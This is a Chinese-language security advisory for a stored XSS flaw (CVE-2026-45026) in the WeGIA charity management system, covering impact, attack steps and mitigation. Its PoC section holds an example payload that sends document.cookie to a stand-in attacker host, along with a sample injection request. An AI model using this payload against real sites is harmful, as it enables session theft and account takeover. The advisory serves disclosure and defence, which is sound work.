CVE-2026-45026 WeGIA 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-45026

漏洞类型

存储型XSS

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WeGIA

漏洞概述

WeGIA是用于慈善机构的网络管理系统。在其3.7.3之前的版本中，存在一个存储型跨站脚本（XSS）漏洞。经过身份认证的用户可以在“Processo de Aceitação”页面（html/atendido/processo_aceitacao.php）中注入恶意JavaScript代码。当其他用户访问该页面时，注入的脚本将被执行，从而导致会话劫持和账户接管。该漏洞已在3.7.3版本中修复。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS）。漏洞根源在于WeGIA系统在处理 `html/atendido/processo_aceitacao.php` 页面的用户输入时，未对数据进行充分的过滤和转义，导致恶意脚本被持久化存储在服务器端。攻击者需要具备高权限（PR:H）才能利用此漏洞。由于攻击向量为网络（AV:N）且无需用户交互（UI:N），一旦恶意代码被注入，任何访问该受影响页面的用户都会在浏览器中执行该脚本。鉴于CVSS向量中的范围改变（S:C）和高机密性影响（C:H），攻击者可通过窃取的Session Cookie进行身份绕过，进而接管账户或窃取敏感数据。利用条件较低（AC:L），危害性较大。

攻击链分析

STEP 1

1. 身份认证

攻击者需要获取WeGIA系统的一个高权限账户（如管理员或编辑账户）。

STEP 2

2. 恶意注入

攻击者访问 `processo_aceitacao.php` 页面，在输入字段中注入恶意的JavaScript代码（例如窃取Cookie的脚本）。

STEP 3

3. 数据存储

系统未对输入进行有效过滤，将恶意脚本存储在数据库中。

STEP 4

4. 触发漏洞

当其他用户（特别是管理员）访问包含该数据的页面时，浏览器会解析并执行恶意脚本。

STEP 5

5. 会话劫持

恶意脚本将受害者的Session ID发送给攻击者，攻击者利用该ID接管用户账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for Stored XSS in WeGIA < 3.7.3
// Target: html/atendido/processo_aceitacao.php
// Description: Inject a script to capture cookies via an image tag or script tag.

// Example payload to be injected in the vulnerable field:
// <img src=x onerror="fetch('http://attacker-site/?c='+document.cookie)">

// HTTP Request simulation
POST /html/atendido/processo_aceitacao.php HTTP/1.1
Host: target-wegia.com
Content-Type: application/x-www-form-urlencoded

vulnerable_parameter=<script>alert('XSS')</script>&submit=Save

影响范围

WeGIA < 3.7.3

防御指南

临时缓解措施

如果无法立即升级，建议在Web应用防火墙（WAF）中部署针对XSS攻击的过滤规则，并在后端代码中对 `processo_aceitacao.php` 相关的输入参数实施严格的输入验证和HTML实体编码，以防止脚本被执行。